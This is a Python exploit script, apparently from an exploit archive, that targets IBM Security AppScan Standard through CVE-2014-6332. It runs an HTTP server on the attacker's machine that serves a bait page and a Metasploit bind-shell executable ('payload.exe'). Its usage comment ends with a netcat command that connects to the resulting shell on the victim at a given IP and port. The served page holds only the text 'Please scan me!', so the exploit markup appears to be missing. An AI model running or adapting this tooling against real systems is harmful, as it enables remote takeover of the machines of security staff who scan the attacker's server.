#!/usr/bin/python

import BaseHTTPServer, socket

##
# IBM Security AppScan Standard OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
#
# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ 
# if you able to exploit IE then you can exploit appscan and acunetix ;)
# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And
# Metasploit windows/shell_bind_tcp Executable Payload
#
# Usage:
#       chmod +x appscan.py
#       ./appscan.py
#       ...
#       nc 172.20.10.14 333
#
# Video: http://youtu.be/hPs1zQaBLMU
##

class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(req):
        req.send_response(200)
        if req.path == "/payload.exe":
            req.send_header('Content-type', 'application/exe')
            req.end_headers()
            exe = open("payload.exe", 'rb')
            req.wfile.write(exe.read())
            exe.close()
        else:
            req.send_header('Content-type', 'text/html')
            req.end_headers()
            req.wfile.write("""Please scan me!
                            """)

if __name__ == '__main__':
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    server.server_close()